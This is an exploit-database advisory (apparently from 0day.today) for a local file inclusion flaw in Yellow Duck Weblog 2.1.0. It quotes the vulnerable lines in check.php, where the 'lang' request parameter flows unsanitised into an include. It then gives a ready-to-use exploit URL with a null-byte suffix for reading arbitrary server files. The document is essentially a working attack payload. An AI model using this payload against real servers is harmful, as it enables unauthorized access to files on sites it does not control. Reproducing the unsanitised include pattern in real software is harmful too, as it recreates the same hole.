id: 5024
date: 04/12/2009
title: Yellow Duck Weblog 2.1.0 (lang) Local File Inclusion Vulnerability
author: ahmadbady
cves: 

==================================================================
Yellow Duck Weblog 2.1.0 (lang) Local File Inclusion Vulnerability
==================================================================



                =-=-local file include-=-=

-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=
script::Yellow Duck Weblog
-------------------------------------------------
Author: ahmadbady

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
download from:http://prdownload.berlios.de/ydframework/YDWeblog-2.1.0-final.tar.gz

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=--=-=-=-=-=-=-=-==-=-=
vul: /include/languages/check.php

$file = 'language_' . $_GET['lang'] . '.php'; line 9

include $file; line 20
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-
xpl:
/path/include/languages/check.php?lang=[local file]%00
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-




#  0day.today [2023-03-24]  #